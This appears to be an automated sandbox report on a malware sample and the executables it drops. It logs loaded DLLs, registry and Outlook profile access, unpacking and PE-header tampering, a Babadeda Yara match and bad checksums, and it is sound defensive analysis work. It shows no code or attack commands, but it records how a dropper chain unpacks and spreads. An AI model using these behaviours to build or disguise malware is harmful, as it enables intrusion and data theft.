Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: winmm.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: wldp.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: propsys.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: profapi.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: edputil.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: slc.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: userenv.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sppc.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: mpr.dll
Source: C:\Users\user\1000003002\5aa32fec17.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: gdi32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: msasn1.pdb source: firefox.exe, 00000021.00000003.3397835645.00000169CD8A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xWindows.Security.Integrity.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nsi.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: UxTheme.pdb@ source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winrnr.pdb source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: imm32.pdb source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413206321.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Unpacked PE file: 6.2.RoamingBKJEGDGIJE.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Unpacked PE file: 9.2.RoamingIJEGDBGDBF.exe.60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 14.2.explorti.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 15.2.explorti.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yaomedmc:EW;ihlphrnj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 19.2.axplong.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;legihfsp:EW;iwukfltx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 20.2.7ca32398cd.exe.400000.0.unpack
Source: C:\Users\user\1000003002\5aa32fec17.exe Unpacked PE file: 23.2.5aa32fec17.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Unpacked PE file: 37.2.7ca32398cd.exe.400000.0.unpack
Yara detected Babadeda
Source: Yara match File source: 23.0.5aa32fec17.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.5aa32fec17.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\1000003002\5aa32fec17.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe, type: DROPPED
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: axplong.exe.6.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1db40a should be: 0x1e3eb5
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
Source: 5aa32fec17.exe.18.dr Static PE information: real checksum: 0x0 should be: 0x19435
Source: explorti.exe.9.dr Static PE information: real checksum: 0x1dbc9d should be: 0x1e053f
